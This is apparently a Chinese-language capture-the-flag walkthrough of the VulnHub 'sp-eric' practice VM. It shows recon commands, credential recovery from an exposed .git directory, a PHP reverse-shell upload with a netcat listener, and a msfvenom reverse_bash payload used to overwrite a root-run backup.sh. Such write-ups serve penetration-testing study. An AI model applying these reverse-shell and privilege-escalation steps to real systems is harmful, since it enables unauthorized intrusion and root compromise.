Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,基本都是要求从启动虚机到获取操作系统root权限和查看flag(即Boot to Root);网址:https://www.vulnhub.com。

本篇使用的靶机,请大家参考官方网站,自行下载靶机:https://www.vulnhub.com/entry/sp-eric,274/

目录

  1. 环境搭建
  2. 渗透测试过程
    1. 靶机发现
    2. 利用文件上传漏洞反弹
    3. 提权
  3. 参考网站

环境搭建

我使用的VirtualBox进行测试,攻击机(Kali linux 2019 32位),IP地址为 192.168.56.104

难度:初学者

目标:

  • /root/flag.txt
  • /home/eric/flag.txt

难度:初学者

渗透测试过程

靶机发现

发现靶机命令:netdiscover -r 192.168.56.0/24

对IP地址进行nmap扫描:nmap -sV 192.168.56.103

存在80端口,访问网站,并没有获得有用的信息;

使用dirb进行目录扫描,目录字典使用默认字典:dirb http://192.168.56.103

发现有三个可疑的问题:

  • .git可能存在文件泄露漏洞;
  • admin.php登录界面,是否能够使用爆破或注入手段或者其他方法进行登录;
  • upload可能存在文件上传漏洞;

使用GitHack对目录进行扫描,可以下载index.phpadmin.php,在admin.php发现了用户名和密码:`admin/st@mpch0rdt.ightiRu$glo0mappL3`

登录页面后,发现上传页面;

利用文件上传漏洞反弹

直接上大马php-reverse-shell.php,修改相应反向链接地址与监听端口进行上传;

连接kali,反弹shell,kali的IP地址为192.168.56.104,监听端口为1234nc -lvp 1234

上图中当获取到shell后,利用一行python命令将简单的shell转换成完全交互式的TTY,可以防止在使用过程中被挂起等一些意外操作。

然后发现当前用户目录中的flag.txt,完成目标二

提权

反弹shell,发现/home/eric目录下存在backup.sh,可以以root的身份执行,而bashup的内容就是对网站文件打包压缩;

使用msf,产生sh文件 msfvenom -p cmd/unix/reverse_bash lhost=192.168.56.104 lport=4455 R

覆盖原有的backup.sh;

在kali中监听4455端口,得到root权限,获得flag;

成功拿到root权限下的flag,该靶机还是比较简单的。

参考网站

GitHack:https://github.com/lijiejie/GitHack

php-reverse-shell(大马):https://github.com/pentestmonkey/php-reverse-shell